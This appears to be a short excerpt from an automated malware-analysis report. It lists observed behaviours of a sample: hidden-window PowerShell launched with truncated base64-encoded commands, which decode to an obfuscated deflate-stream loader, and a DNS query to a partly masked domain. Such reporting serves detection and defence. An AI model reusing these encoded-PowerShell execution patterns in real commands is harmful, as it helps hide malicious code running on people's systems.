Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAGUAVwAtAE8AYgBqAGUAYwBUACAAUwBZAHMAdABFAE0ALgBJAG8ALgBzAHQAcgBlAEEAbQBSAGUAQQBkAGUAcgAoACAAKAAgAE4AZQBXAC0ATwBiAGoAZQBjAFQAIABpAG8ALgBjAG8AbQBwAFIAZQBzAFMAaQBPAE4ALgBkAGUAZgBMAEEAdABFAH...
- DNS ASK km###dhwe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAGUAVwAtAE8AYgBqAGUAYwBUACAAUwBZAHMAdABFAE0ALgBJAG8ALgBzAHQAcgBlAEEAbQBSAGUAQQBkAGUAcgAoACAAKAAgAE4AZQBXAC0ATwBiAGoAZQBjAFQAIABpAG8ALgBjAG8AbQBwAFIAZQBzAFMAaQBPAE4ALgBkAGUAZgBMAEEAdABFAH...' (with hidden window)